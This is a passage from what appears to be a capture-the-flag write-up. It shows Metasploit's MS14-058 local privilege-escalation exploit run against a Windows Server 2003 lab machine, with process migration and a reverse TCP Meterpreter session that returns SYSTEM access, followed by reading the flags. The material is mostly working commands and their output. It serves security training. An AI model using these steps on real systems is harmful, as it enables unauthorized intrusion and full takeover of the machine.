msf5 exploit(windows/local/ms14_058_track_popup_menu) > run

[*] Started reverse TCP handler on 10.10.14.34:4444
[-] Exploit failed: Rex::Post::Meterpreter::RequestError stdapi_sys_config_getsid: Operation failed: Access is denied.
[*] Exploit completed, but no session was created.

That wasn't expected. The session lives in rundll32.exe (PID 2452), a process for which even ps cannot show a user and in which the getsid call is denied, so we migrate into another NETWORK SERVICE process (wmiprvse.exe, PID 1832) and run the exploit again.

msf5 exploit(windows/local/ms14_058_track_popup_menu) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > ps
Process List
============

 PID   PPID  Name               Arch  Session  User                          Path
 ---   ----  ----               ----  -------  ----                          ----
 0     0     [System Process]
 4     0     System
 272   4     smss.exe
 324   272   csrss.exe
 348   272   winlogon.exe
 396   348   services.exe
 408   348   lsass.exe
 608   396   svchost.exe
 680   396   svchost.exe
 736   396   svchost.exe
 772   396   svchost.exe
 800   396   svchost.exe
 936   396   spoolsv.exe
 964   396   msdtc.exe
 1076  396   cisvc.exe
 1116  396   svchost.exe
 1176  396   inetinfo.exe
 1216  396   svchost.exe
 1328  396   VGAuthService.exe
 1408  396   vmtoolsd.exe
 1456  396   svchost.exe
 1600  396   svchost.exe
 1700  396   alg.exe
 1832  608   wmiprvse.exe       x86   0        NT AUTHORITY\NETWORK SERVICE  C:\WINDOWS\system32\wbem\wmiprvse.exe
 1912  396   dllhost.exe
 2304  608   wmiprvse.exe
 2336  1456  w3wp.exe           x86   0        NT AUTHORITY\NETWORK SERVICE  c:\windows\system32\inetsrv\w3wp.exe
 2404  608   davcdata.exe       x86   0        NT AUTHORITY\NETWORK SERVICE  C:\WINDOWS\system32\inetsrv\davcdata.exe
 2452  2336  rundll32.exe       x86   0                                      C:\WINDOWS\system32\rundll32.exe
 3000  608   wmiprvse.exe
 3592  800   wmiadap.exe

meterpreter > migrate 1832
[*] Migrating from 2452 to 1832...
[*] Migration completed successfully.
meterpreter > bg
[*] Backgrounding session 1...
msf5 exploit(windows/local/ms14_058_track_popup_menu) > run
[*] Started reverse TCP handler on 10.10.14.34:4444
[*] Launching notepad to host the exploit...
[+] Process 3872 launched.
[*] Reflectively injecting the exploit DLL into 3872...
[*] Injecting exploit into 3872...
[*] Exploit injected. Injecting payload into 3872...
[*] Payload injected. Executing exploit...
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
[*] Sending stage (180291 bytes) to 10.10.10.14
[*] Meterpreter session 3 opened (10.10.14.34:4444 -> 10.10.10.14:1034) at 2019-11-17 22:55:13 -0500

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

User and root flags

meterpreter > shell
Process 4008 created.
Channel 1 created.
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.

C:\WINDOWS\system32>cd "C:\Documents and Settings\"
cd "C:\Documents and Settings\"

C:\Documents and Settings>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 246C-D7FE

 Directory of C:\Documents and Settings

04/12/2017  04:32 PM    <DIR>          .
04/12/2017  04:32 PM    <DIR>          ..
04/12/2017  04:12 PM    <DIR>          Administrator
04/12/2017  04:03 PM    <DIR>          All Users
04/12/2017  04:32 PM    <DIR>          Harry
               0 File(s)              0 bytes
               5 Dir(s)  18,091,675,648 bytes free

C:\Documents and Settings>cd Harry\Desktop
cd Harry\Desktop

C:\Documents and Settings\Harry\Desktop>type user.txt
type user.txt
<USER FLAG>

C:\Documents and Settings>cd Administrator\Desktop
cd Administrator\Desktop

C:\Documents and Settings\Administrator\Desktop>type root.txt
type root.txt
<ROOT FLAG>

References

Daniel Simao 21:29, 17 November 2019 (EST)